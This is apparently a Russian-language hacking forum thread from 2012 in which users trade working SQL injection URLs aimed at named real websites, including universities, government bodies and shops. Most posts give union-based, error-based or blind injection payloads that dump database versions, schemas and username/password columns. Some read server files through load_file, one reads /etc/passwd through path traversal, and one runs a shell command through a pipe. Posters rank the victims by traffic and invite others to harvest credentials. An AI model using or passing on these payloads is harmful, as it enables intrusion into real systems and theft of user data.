Просмотр полной версии : SQL Инъекции
BLurpi^_^
21.05.2012, 18:06
http://www.southmississippi.biz/news/article.php
?id=00032
&vol=10+union+select+1,2,version(),4,5,6,7,8,9,10,1 1--
Вывод в самом низу.
ПР:3
4.1.21 4
winstrool
22.05.2012, 00:26
http://www.veditours.ru/main.php?pid=5&page=-364'+union+select+(select(@x)from(select(@x:=0x00) ,(select(0)from(information_schema.columns)where(t able_schema!=0x696e666f726d6174696f6e5f736368656d6 1)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schem a,0x2e,table_name,0x3a,column_name))))x),2,3+--+&add=on
http://www.bolshoi-theater.com/theatre_staff.php?person_id=-1+union+select+1,2,3,version(),5,6,(select(@x)from (select(@x:=0x00),(select(0)from(information_schem a.columns)where(table_schema!=0x696e666f726d617469 6f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c6 2723e,table_schema,0x2e,table_name,0x3a,column_nam e))))x),8,9,0,11,12+--+
СЛИВКИ!
ТИЦ:750 PR:4 инд.Я:65000 инд.G:152000 траф:5500
http://damochka.ru/sms/info_ext.phtml?sec=gul&key=-482756+union+select+1,2,3,(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),5 ,6,7,8+--+
вот что сказал гугл по ачату)))
site:forum.antichat.ru "damochka.ru"
Code:
http://www.happycow.net/respondtoreview1.php?id=-5420+/*!union*/+/*!select*/+1,concat_ws%280x3a,user%28%29,version%28%29,datab ase%28%29%29--&rvid=13077
Username: happycow_con2db@localhost
Version: 5.0.95-community
Database: happycow_hcdata
GooglePR: 6
Га-Ноцри
23.05.2012, 00:15
Очень толстый сайт. Дерзайте.
ТИЦ == 2300, PR == 2, трафф == 10k, ЯK == true, DMOZ == true;
PHP:
http://saint-petersburg.ru/loc/opros/vote.php?id=-9+union+select+1,2,load_file('/usr/local/etc/nginx/nginx.conf'),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Code:
http://pharmacyschool.usc.edu/faculty/?id=-95+union+select+1,2,3,4,concat_ws(user(),database( ),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38--
PR=6
PHP :
PHP:
http://www.healthplus.hk/past_details.php?id=-74%20union%20select%201,2,3,4,g roup_concat%28t able_name%29 ,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24, 25,26,27+from+information_ schema.tables-
PHP:
http://www.vivamagonline.com/DidYouKnow.php?ID=-10%20union%20select%201,2,3,group_concat%28table_n ame%29,5,6+f rom+information_schema.t ables--
PHP:
http://cs.furman.edu/blog/index.php?id=null%20union%20all%20select%201,gr oup_concat%28id,0x3a,user,0x3a,p assword%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,2 1,22,23,24,25,26%20from%20zp_administrators--
PHP:
https://www.kisantech.com/index.php?cat_id=-1+UNION+SELECT+group_concat%28u ser,0x3a,p a ss%29,2,3,4,5,6,7,8 ,9,10+from+store_config--
PHP:
http://bollystic.com/Bollywood/showMovie.php?id=-564%20union%20select%201,2,3,4,g roup_concat%28 user,0x3a,p assword%29,6,7,8,9,10%20from%20mysq l.user--
Code:
http://www.thompsonhistory.co.uk/cgi-bin/page.pl?page=|ls%20-la|
http://edu.nstru.ac.th/~english/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
DeepBlue7
24.05.2012, 01:21
Ничего зверского, но нате )
Code:
http://www.mntk21.ru/news_list.php?id=1+union+select+concat_ws(0x3a,ver sion(),user(),database()),2--
5.0.51a-24+lenny5:c1_mntk21@localhost:c1_mntk21
Code:
http://bc.ru/news_list.php?id=568+union+select+1,2,concat_ws(0x 3a,version(),user(),database()),4,5,6,7,8,9,10,11, 12,13,14,15--
4.0.27:root@pm3.zenon.net:belmontgroup
Code:
http://www.gogreenplumber.com/news_list.php?id=164+and+1=0+union+select+1,concat _ws(0x3a,version(),user(),database()),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20--
4.1.22-standard:gogreen_gogreen@localhost:gogreen_gogreen
Code:
http://gsonline.hu/portal/news_list.php?id=1+union+select+1,concat_ws(0x3a,v ersion(),user(),database())
5.0.95-community:gsonli01_user1@localhost:gsonli01_db1
InDuStRieS
24.05.2012, 05:42
Code:
http://ponovo.com.cn/product_category.php?ID=47+union+select+concat_ws( 0x3a,version(),user(),database()),2+--+
5.0.92-log:relaytestdb@208.109.14.103:relaytestdb
PR: 4
http://www.shishlov.ru/politics/index.phtml?id=-513+union+select+1,2,3,4,5,6,7,8,9,10,version(),12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31--+
Сайт члена партии "Яблоко".
InDuStRieS
24.05.2012, 19:54
Code:
http://www.tdkmpk.ru/product.php?id=2+union+select+1,concat_ws(0x3a,ver sion(),database(),user()),3,4+--+
PR: 1
Га-Ноцри
24.05.2012, 20:22
ТиЦ == 180, PR == 2, трафф == 20K, ЯК == true;
PHP:
http://www.webmath.ru/stat.php?board=-8+union+select+concat_ws(0x03a,database(),user(),v ersion())--
InDuStRieS
24.05.2012, 20:43
Code:
http://www.hochiveda.net/russian/product.php?id=-7+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35
InDuStRieS
24.05.2012, 21:02
Code:
http://www.globalleader.com.hk/product.php?mode=4&product_id=-9+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12+--+
4.0.17-standard:gleader:root@localhost
PR: 1
Га-Ноцри
25.05.2012, 23:59
ТИЦ == 70, PR == 4;
PHP:
http://healthspa.ru/shownew.php?id=216+and+(select+1+from(select+count (*),concat(database(),floor(rand(0)*2))x+from+info rmation_schema.tables+group+by+x)a)--
Salo-po-3.5
26.05.2012, 16:59
PHP:
http://www.l3m.univ-mrs.fr/seml3m.php?id=-1+UNION+SELECT+1,2,3,5,6,login,pass,8,9,10,11,12,1 3,14+FROM+users+LIMIT+1,1--
PHP:
http://www.intorsura.ro/bis_man/bis.php?id=-1+union+select+concat_ws(user(),database(),version ()%20),2,3,4,5,6,7,8,9,10,11--
PR 4
Тиц 0
Большая база данных пользователей. Можно переберать
Code:
LIMIT+1,1--
- Подставляем числа по порядку
Так-же есть таблица mysql.user
Там данные от панели MYSQL Пользуйтесь!
PR: 5
Тиц: 0
PHP:
http://www.sportznak.ru/medali28m.php?id=-1+UNION+SELECT+1,login,password,3,5,6,7+FROM+b_use r+LIMIT+4,2--
Яндекс тиц: 30
Google PR : 1
PHP:
http://www.adventuresoft.com/s_f1s.php?id=-1+UNION+SELECT+1,2,username,password,5,6,7+FROM+us ers+LIMIT+1,1--
PHP:
http://www.adventuresoft.com/s_f1s.php?id=-1+UNION+SELECT+1,2,username,password,5,6,7+FROM+us ers+LIMIT+0,1--
PHP:
http://www.nmu.edu.ua/news-e.php?id_news=-1+union+select+1,version(),3,user(),5,6,7,8,9--
Яндекс Тиц: 450
Google PR: 5
Konqi: попращайничеством не занимаемся, посты не набиваем, логины/хеши не выкладываем
shell_c0de
27.05.2012, 00:18
Уважаемый хацкеры читайте правила пожалуйста.
/thread18883.html
пункт 8
ShakeSDog
27.05.2012, 00:42
Жаль до конца не смог((
PHP:
http://www.couleebank.net/newsletters/newsletter.php?id=45+union+select+1,2,3,4,5,concat _ws%280x3a,column_name%29,7,8,9,10,11,12,13,14,15, 16,17,18+from+information_schema.columns--
pouet.net
PHP:
http://www.pouet.net/bbses.php?which=-713%20union%20select%201,c oncat%28table_name%2 9,3,4,5,6,7,8,9+f rom+information_schema.tables--
Google PR : 4
Salo-po-3.5
27.05.2012, 15:46
PHP:
http://www.psyboard.com/yes.php?id=-1+union+select+1,concat_ws(0x03a,login,password)+f rom+users--
Google PageRank (PR) 2
PHP:
http://status.hostexcellence.com/page/8/
Cookie inputwordpress_1a75a868d91285923da705f3784dd715
was set to WP+Cookie+check"=sleep(7.812)="
healing-hearts-centre.co.uk
PHP:
http://www.healing-hearts-centre.co.uk/view_faq.php?id=-1+/*!union*/+select+1,/*!unhex%28hex%28g roup_concat%28username,0x3a,p assword%29%29%29*/,3+from+u sers
ebay.com.np
PHP:
http://www.ebay.com.np/index.php?task=productdetails&pid=-2710+/*!uniOn*/+all+/*!sElEct*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,g roup_co ncat(username,0x3a3a,p assword),18,19+/*!from*/+admin--
dcucenter.com
PHP:
http://www.dcucenter.com/event.php?id=-103+UNION+SELECT+1,group_concat%28username,0x3a,p assword%29,3,4,5,6,7,8, 9,10,11+from+users--
jlos.go.ug
PHP:
http://www.jlos.go.ug/documents.php?id=-2+union+select+g roup_concat%28username,0x3a,pa ssword%29+from+u sers--
capitalcurrencies.org
PHP:
http://capitalcurrencies.org/newsitem.php?id=-13%20union%20select%201,g roup_concat%28u sern ame,0x3a,pass%29,3,4,5+f rom+u sers--
infinim.fr
PHP:
http://www.infinim.fr/phototheque.php?id=-1%20union%20select%201,2,group_concat%28id_utilist eur,0x3a,email,0x3a,p assword,0x3C62723E%29,4,5 ,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21%2 0from%20utilisateur--
www.thungkhok.go.th
PHP:
http://www.thungkhok.go.th/webboard/webboard_view.php?topic_id=-7%20/**/%20union%20/**/%20select%20/**/%20all%20/**/%201,2,group_concat%28username,0x3a,p assword,0 x3a,chk_status,0x3c62723e%29,4, 5,6,7,8%20/**/%20from%20/**/%20m_log%20/**/%20Samyetli
Code:
http://www.equinoxefm.be/pages/emission.php?id=20'
Code:
http://www.scooter-attack.com/index2.php?main=http://www.1tv.ru/projects/pp=5288
Га-Ноцри
28.05.2012, 02:10
В меру упитанный забугорный сайт. Осталось только найти папку для записи.
Dipartimento di Matematica - Politecnico di Milano
PR == 5
http://www.mate.polimi.it/viste/pagina_personale/pagina_personale.php?id=-227'+union+select+load_file('/var/www/html/nonsicura/web/index.php'),2+--+h
На основном домене polimi.it трафф == ~8k. Он также дырявый, но сервер, к сожалению, другой.
ros.gov.my
PHP:
http://www.ros.gov.my/index.php?page=faq_detail&id=-19+union+%2F*!50000SELECT*%2F+1%2Cg roup_concat %28staff_name%2C0x3a%2Cpass%29%2C3%2C4%2C5%2C6%2C7 %2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15+from+t b l_users
Га-Ноцри
28.05.2012, 02:47
ТИЦ == 30, PR == 4, трафф == 2k;
PHP:
http://arenda-open.ru/?page=news&newsID=379'+and+(select+1+from(select+count(*),con cat(database(),floor(rand()*2))x+from+information_ schema.tables+group+by+x)a)--+h
Salo-po-3.5
28.05.2012, 13:12
PHP:
http://uumts.utk.ru/t_and_p.php?id=-1+union+select+1,concat_ws(0x03a,user,pass),3,4,5, 6,7,8,9+from+userlist--
Salo-po-3.5
28.05.2012, 20:02
PHP:
http://www.munichwalktours.de/home/english/ghost_tour.php?id=-1+union+select+1,2,concat_ws(0x03a,adminpass,aname ,aemail)+from+admin--
Тиц 0
Пр: 4
winstrool
28.05.2012, 21:59
http://www.scooter-tronix.ru/showcomments.php?art=-42+/*!union*/+select+(select(@x)from(select(@x:=0x00),(select(0 )from(information_schema.columns)where(table_schem a!=0x696e666f726d6174696f6e5f736368656d61)and(0x00 )in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name))))x),2+--+
http://www.ccies.ru/click.php?id=28+OR+(SELECT+COUNT(*)+FROM+(SELECT+1 +UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(M ID((select+concat_ws(0x3a,user(),version(),databas e())),1,63)+,+FLOOR(RAND(0)*2)))+--+
Для тех кто любит взрывать себе мозг
true
http://www.ccies.ru/click.php?id=28+OR+(SELECT+COUNT(*)+FROM+(SELECT+1 +UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(M ID((ascii(mid((select+id+from+users+limit+0,1),1,1 ))%3E=49),1,63)+,+FLOOR(RAND(0)*2)))+--+
false
http://www.ccies.ru/click.php?id=28+OR+(SELECT+COUNT(*)+FROM+(SELECT+1 +UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(M ID((ascii(mid((select+id+from+users+limit+0,1),1,1 ))%3E=59),1,63)+,+FLOOR(RAND(0)*2)))+--+
еще блиндика)))
http://www.mfsng.ru/page/click.php?id=79+and+1=0
http://www.mfsng.ru/page/click.php?id=79+and+1=1
Га-Ноцри
30.05.2012, 01:33
Экзотика экзотикой, однако:
ТИЦ == 10, PR == 6, DMOZ == true;
PHP:
http://www.h.u-tokyo.ac.jp/news/news.php?newsid=-632+union+select+1,2,3,4,5,6,concat_ws(0x03a,user_ id,password),8,9,10,11,12,13,14,15,16,17,18,19+fro m+news_user--
http://www.vodkarodnik.com/images/logo.gif
я думаю, что самарские пользователи оч хорошо знают этот чудесный напиток и употребляют его в декалитрах)))
http://www.vodkarodnik.com/news.php?news=-85%20and%201=2%20union%20select%201,concat_ws(char (58),@@version,user(),database(),@@version_compile _os),3+--
5.0.92-log u77995@10.8.1.125 u77995 portbld-freebsd8.2
shadowrun
30.05.2012, 15:54
http://www.kyocera-toner.ru/catalog/product.php?id=-58998+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,co ncat_ws%280x3a,name,email,password%29,14,15,16,17, 18+from+access_users+limit+0,1+--+
ТИЦ - 60
ПР - 2
ЯК - тру
http://optvideo.com/new_design/new_kat/view.php?kod=-926091+union+select+1,2,3,4,5,6,7,concat_ws%280x3a ,table_name%29,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23+from+information_schema.tables+where+tabl e_schema=database%28%29+limit+1,1+--+
ТИЦ - 40
ПР - 4
www.ekvator-hifi.ru/catalog_include.php?id=-2836+union+select+1,2,3,4,5,6,7,version(),9,10,11, 12,13,14,15,16,17+--+
ТИЦ - 240
ПР - 2
ЯК - есть
http://www.med-ray.ru/images/logo.gif
http://www.med-ray.ru/view.php?ID=-195+union+select+1,2,3,4,5,user%28%29,7,8,9,10,11, 12--
medray@localhost
Га-Ноцри
31.05.2012, 00:47
Ничего интересного. ТИЦ == 30, PR == 3;
PHP:
http://pro-volga.ru/architector.phtml?id=-4+union+select+concat_ws(0x03a,database(),user(),v ersion()) --
tkermak.ru
PHP:
http://www.tkermak.ru/?id=906+or+1+group+by+concat%28%28select+version%2 8%29%29,0x00,floor%28rand%280%29*2%29%29having+min %280%29+or+1--+
5.1.61-beget-log
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 1
------------------------------------------------------------------------------------
admozr.ru
PHP:
http://www.admozr.ru/press_centr/novosti/?id=912%27+or+1+group+by+concat%28%28select+versio n%28%29%29,0x00,floor%28rand%280%29*2%29%29having+ min%280%29+or+1--+
5.0.85-community-nt-log
Яндекс тИЦ (CY) 70
Alexa Rank 2,961,714 -3,320,091
Google PageRank (PR) 3
------------------------------------------------------------------------------------
video.aggf.ru
PHP:
http://video.aggf.ru/rec.php?id=69+or+1+group+by+concat%28%28select+ver sion%28%29%29,0x00,floor%28rand%280%29*2%29%29havi ng+min%280%29+or+1--+
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 3
5.1.41-log
------------------------------------------------------------------------------------
patriotpc.ru
PHP:
http://www.patriotpc.ru/main/index.html?id=93&parent_id=179+or+1+group+by+concat%28%28select+ver sion%28%29%29,0x00,floor%28rand%280%29*2%29%29havi ng+min%280%29+or+1--+
5.1.61-log
------------------------------------------------------------------------------------
coffeek.ru
PHP:
http://www.coffeek.ru/tovar_full.phtml?tv=925%27+and%28select+1+from%28s elect+count%28*%29,concat%28%28select+version%28%2 9%29,0x00,floor%28rand%280%29*2%29%29x+from+inform ation_schema.tables+group+by+x%29a%29--+
5.0.77-log
Яндекс тИЦ (CY) 40
Alexa Rank 1,389,457 -132,746
Google PageRank (PR)
-----------------------------------------------------------------------------------
svetozar-shop.ru
PHP:
http://svetozar-shop.ru/index.php?productID=723%27+and%28select+1+from%28s elect+count%28*%29,concat%28%28select+version%28%2 9%29,0x00,floor%28rand%280%29*2%29%29x+from+inform ation_schema.tables+group+by+x%29a%29--+
5.1.55
Яндекс тИЦ (CY) 10
Alexa Rank 0
Google PageRank (PR) 2
------------------------------------------------------------------------------------
atomelectric.ru
PHP:
http://www.atomelectric.ru/index.php?id=5&rub1=2&rub2=8+or+1+group+by+concat%28%28select+version%28 %29%29,0x00,floor%28rand%280%29*2%29%29having+min% 280%29+or+1--+
5.1.36-log
Яндекс тИЦ (CY) 20
Alexa Rank 2,460,163 +439,845
Google PageRank (PR) 3
-----------------------------------------------------------------------------------
Га-Ноцри
31.05.2012, 20:56
Парфюмерия. ТИЦ == 90, PR == 3;
PHP:
http://dabka.ru/?cnt=245&article_id=&subid=-367+union+select+version()
kingbeef
01.06.2012, 13:37
Казанская лингвистическая школа.
Тиц 3500
PR 7
PHP:
http://www.ks[google]u.ru/f10/publications/kls/boduen/bodart1_1.php?id=5-9999999.9+union+select+1,2,concat_ws(0x3a,version( ),user(),database()),4--+f
5.0.67:filfak@localhost:biblfil
Информационное агенство
Тиц 3100
PR 5
PHP:
http://uralp[google]ress.ru/bank/news.php?id=5294-9999999.9+union+select+1,2,3,concat_ws(0x3a,versio n(),user(),database()),5,6,7,8--+f
5.0.90-log:3wupi1@localhost:fin
Сайт о недвижимости
Тиц 6200
PR 5
PHP:
http://www.aren[google]dator.ru/about_smi.php?id=59-999999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22--+f
Тиц = 10;
PR = 4;
DMOZ = true;
http://www.xypex.com/newsreel/article.php?entryID=-58+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29--
winstrool
01.06.2012, 21:55
http://strekoza-dizain.ru/imshow.php?pid=-58+union+select+1,2,3,4,5,6,7,8,9,0,(select(@x)fro m(select(@x:=0x00),(select(0)from(information_sche ma.columns)where(table_schema!=0x696e666f726d61746 96f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c 62723e,table_schema,0x2e,table_name,0x3a,column_na me))))x),12,13,14
бейсик авторизация(((
nemaniak
01.06.2012, 22:38
volgoduma.ru PR-5 ТИЦ-700 Волгоградская Обл. Дума
Code:
volgoduma.ru/index.php?option=com_artforms&task=vferforms&id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6+--+
Code:
5.1.41-log:volgoduma_mysql@212.193.249.236:volgoduma_db
wblib.org PR-6
Code:
www.wblib.org/read/pearl.php?item=-209+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19--
Code:
5.5.16:WBPubUser@Main-WWWA:newweb
mariogames1.com Alexa-88k
Code:
www.mariogames1.com/index.php?pageid=2+and+1=0+union+select+1,2,3,4,co ncat_ws(0x3a,version(),user(),database())+--+
Code:
5.0.77:newmario1@localhost:admin_mario1
career.qc.cuny.edu PR-5
Code:
career.qc.cuny.edu/index.php?pageID=-105+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),user(),database()),9,10,11,12,13+--+
Code:
5.0.41:Salman@localhost:test
Га-Ноцри
02.06.2012, 01:13
Сегодня ничего интересного. Просто какой-то Форекс.
PHP:
http://www.vokino.ru/forex.php?id=-34+union+select+1,2,3,4,5--
HellFire
02.06.2012, 13:35
Всероссийский институт научной и технической информации.
Ведущий информационный центр в России и странах СНГ.
Code:
http://peisv.viniti.ru/showa.php?id=1-666+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User()),2,3,4,5,6,7,8,9,10,11--
Database Version: 4.1.8-standard
Database name: peisv
User name: peisv@localhost
ТИЦ: 3600
PR: 7
Секрет Звезды – интернет-магазин парфюмерии и косметики.
Code:
http://www.elite-parfums.ru/line.php?lineid=1-666+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A 2A2F,Database(),0x2F2A2A2F,User()),7,8,9--
Database Version: 5.1.62-0ubuntu0.10.04.1
Database name: parfume
User name: root@localhost
ТИЦ: 10
PR: 1
Sidarovich1975
02.06.2012, 16:34
HTML:
http://cku1.edu.pl/index.php?id=-1+and+1=2+union+select+concat_ws(0x3a,version(),us er(),database())+from+galerie+--+
HTML:
5.5.20:ckuwzt_an2@an2.alpha.pl:cku1_an2
Га-Ноцри
03.06.2012, 01:30
Фонд Развития Интернет.
ТИЦ == 900, PR == 5, ЯK == true;
PHP:
http://www.fid.ru/?newsid=-1309443900+union+select+1,2,3,concat_ws(0x03a,id,n ame,passwd,email),5,6+from+users--
Админ уведомлен 2 недели назад.
Skofield
03.06.2012, 15:50
Code:
http://libx.bsu.edu/cdm4/collection.php?CISOROOT=-/GrantVetOrH'+union+select+version()--+
Database Version: 5.5.11-log
Database name: dmr_collections
User name: dmr_readonly@libx.bsu.edu
http://tea.ru/?id=1)union select 1 from(select count(*),concat(concat_ws(0x3a,user(),version(),da tabase()),floor(rand(0)*2)) from information_schema.tables group by 2)c%23
ТИЦ: 450
PR: 3
DMOZ: Y
Skofield
03.06.2012, 20:09
Code:
http://physiology.cwru.edu/faculty.php?id=-5+union+select+1,2,3,4,5,version(),7,8,9,10--
Database Version: 5.1.37-community
Database name: backup081609
User name: oldsite@tell.phol.CWRU.Edu
http://www.godsofmetal.it/en/news.php?id=-6%27+union+select+1,version%28%29,3,4,5,6,7--+f
ТИЦ20(R2)
PR5
AR499391
PR=3
http://www.hitchedmag.com/article.php?id=-1360+union+select+1,concat_ws(user(),database(),ve rsion()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42,43,44--
hitchedm_hitchedhitchedm_test@boscgi1203.eigbox.ne t5.0.91-log
PR=4
file_priv=Y
http://www.4cornersclub.com/local/image.php?ID=-2863+union+select+1,2,concat%28version%28%29,0x03a ,user%28%29%29,4,5,6,7,8,9,10,11,12,13,14&Country=128
5.1.50:bojan@localhost
Га-Ноцри
04.06.2012, 01:30
Все для свадьбы в Санкт-Петербурге.
ТИЦ == 650, PR == 3, ЯК == true, трафф == 4k; юзеры == ~45k;
PHP:
http://www.svadbaspb.ru/00-1.shtml?id=-449+union+select+count(*),2,3+from+forum_user--
Вывод в .
Skofield
04.06.2012, 01:54
Code:
http://www.cwu.edu/~dining/CMS_index.php?page=-hours'+union+select+1,2,3,4,5,6,7,group_concat(tab le_name),9,10+from+information_schema.tables--+
Database Version: 5.0.95-log
Database name: Dining
User name: diningweb@webxen0a.cts.cwu.edu
PR 7
Га-Ноцри
04.06.2012, 02:22
ТИЦ == 375, PR == 3, ЯK == true;
Для тех, кому нечего делать
Каноничная "слепая".
PHP:
http://ev.spb.ru/art.php3?newsid=32308+and+ascii(substring((databas e()),2,1))=118
true
PHP:
http://ev.spb.ru/art.php3?newsid=32308+and+ascii(substring((databas e()),2,1))=119
false
moscow.yustas-shop.ru
PHP:
http://www.moscow.yustas-shop.ru/article.php?id=-10732+union+select+1,2,3,4,5,version%28%29,7,8,9,1 0,11,12,13,14,15,16,17,18--+
5.0.51a-24+lenny5
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 2
------------------------------------------------------------------------------------
mama1000.ru
PHP:
http://mama1000.ru/article.php?id=-10731+union+select+1,2,3,4,5,version%28%29,7,8,9,1 0,11,12,13,14,15,16,17,18--+
5.0.51a-24+lenny5
Яндекс тИЦ (CY) 0
Alexa Rank 11,702,559
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
oilkemi.ru
PHP:
http://oilkemi.ru/price.php?id=-1+union+select+1,version%28%29
5.0.51a-24+lenny5-log
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 0
----------------------------------------------------------------------------------
tmtc.ru
PHP:
http://tmtc.ru/news/detail.php?ID=1339+or+1+group+by+concat%28%28selec t+version%28%29%29,0x00,floor%28rand%280%29*2%29%2 9having+min%280%29+or+1--+
5.1.61
Яндекс тИЦ (CY) 30
Alexa Rank 7,410,884 +2,810,424
Google PageRank (PR) 1
-----------------------------------------------------------------------------------
evgeniybolgov.com
PHP:
http://evgeniybolgov.com/view_post.php?id=52%27+or+1+group+by+concat%28%28s elect+version%28%29%29,0x00,floor%28rand%280%29*2% 29%29having+min%280%29+or+1--+
5.1.58
Яндекс тИЦ (CY) 10
Alexa Rank 1,230,694 +506,395
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
vipdosug24.ru
PHP:
http://vipdosug24.ru/company.php?id=670+and%28select+1+from%28select+co unt%28*%29,concat%28%28select+version%28%29%29,0x0 0,floor%28rand%280%29*2%29%29x+from+information_sc hema.tables+group+by+x%29a%29--+
5.0.90-log
Яндекс тИЦ (CY) 20
Alexa Rank 0
Google PageRank (PR) 2
------------------------------------------------------------------------------------
Sidarovich1975
04.06.2012, 23:53
сводки :
http://dps.osu.
edu
/police/psn/CrimeAlert_web.php?id=-7+union+all+select+NULL,@@version,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL+--+
Version:
Microsoft SQL Server 2008 (SP2) - 10.0.4000.0 (Intel X86) Sep 16 2010 20:09:22 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) (VM)
Га-Ноцри
05.06.2012, 16:52
IP-телефония : Интернет-телефония : Компьютерная телефония.
ТИЦ == 230, PR == 3, ЯK == true, DMOZ == true;
Вроде слепая. В примере последний символ. Но меня терзают смутные сомнения, что можно раскрутить проще.
PHP:
http://iptop.net/service/ip_telephony.php?log=898'+and+ascii(substring((dat abase()),7,1))=53--+h
Lam3rsha
05.06.2012, 20:44
http://wigstyle.ru/docs/sovet/index.php?id=5'+UNION+SELECT+1,2,3,AES_DECRYPT(AES _ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version (),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x78737 16C696E6A656E64),0x71),0x71),5,6,7,8,9+LIMIT+1,1/*
http://nice-media.ru/browse_new.php?cat=18+order+by+1--
Га-Ноцри said:
IP-телефония : Интернет-телефония : Компьютерная телефония.
ТИЦ == 230, PR == 3, ЯK == true, DMOZ == true;
Вроде слепая. В примере последний символ. Но меня терзают смутные сомнения, что можно раскрутить проще.
PHP:
http://iptop.net/service/ip_telephony.php?log=898'+and+ascii(substring((dat abase()),7,1))=53--+h
http://iptop.net/service/ip_telephony.php?log=-898'+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31+--+
Га-Ноцри
06.06.2012, 00:10
smirk said:
http://iptop.net/service/ip_telephony.php?log=-898'+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31+--+
Вот-вот, чутье меня не подвело, где-то и почему-то я с group by жёстко обманулся, лол.
Набережночелнинский филиал Нижегородского государственного лингвистического университета им.Н.А. Добролюбова.
ТИЦ == 30, PR ==2;
PHP:
http://nfnglu.ru/?code=111111111+union+select+1,2,concat_ws(0x03a,h ost,user,password),4,5,6,7,8+from+mysql.user--
ombu.primorsky.ru
PHP:
http://ombu.primorsky.ru/articles.php?id=-590+union+select+1,2,3,4,version%28%29,6,7--+
4.1.22-log
Яндекс тИЦ (CY) 80
Alexa Rank 0
Google PageRank (PR) 5
------------------------------------------------------------------------------------
free-games-online.com.ua
PHP:
http://free-games-online.com.ua/view_game.php?id=2259%27+or+1+group+by+concat%28%2 8select+version%28%29%29,0x00,floor%28rand%280%29* 2%29%29having+min%280%29+or+1--+
5.1.63-cll
Яндекс тИЦ (CY) 10
Alexa Rank 3,479,478 -5,288,381
Google PageRank (PR) 1
------------------------------------------------------------------------------------
chov.net
PHP:
http://www.chov.net/gene/1000/genealogie.php?gPage=1&gSearch=&gCmku=1&gNameT=1&gName=cool&gAct=detail&ID=15938+or+1+group+by+concat%28%28select+version% 28%29%29,0x00,floor%28rand%280%29*2%29%29having+mi n%280%29+or+1--+
4.1.20
Яндекс тИЦ (CY) 10
Alexa Rank 12,755,816 +7,338,930
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
Га-Ноцри
07.06.2012, 00:40
PR == 3;
PHP:
http://www.flevotrack.nl/index.php?file=news.php&news_ID=-125+union+select+1,concat_ws(0x03a,username,user_p assword),3,4,5+from+forum_users+limit+1,1--
PR=2
http://www.coolcats.net/photos/index.php?ID=-181+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat %28version%28%29,user%28%29%29,14,15,16,17,18,19,2 0,21,22--
4.0.30-logcoolcats2@208.109.14.86
Skofield
07.06.2012, 21:44
PR 7
Code:
http://www.iucf.indiana.edu/events/seminars.php?group=-np')+union+select+1,unhex(hex(version())),3,4,5,6, 7,8,9,10--+
Database Version: 5.0.18-nt-log
Database name: iucf_web
User name: iucfweb@bl-iucf-mordor.ads.iu.edu
Га-Ноцри
07.06.2012, 22:25
Такие дела.
ТИц == 20, PR == 6, DMOZ == Government;
PHP:
http://www.pima.gov/navigate.aspx?L1=5+or+1=@@version--
Футбольный клуб "Химки":
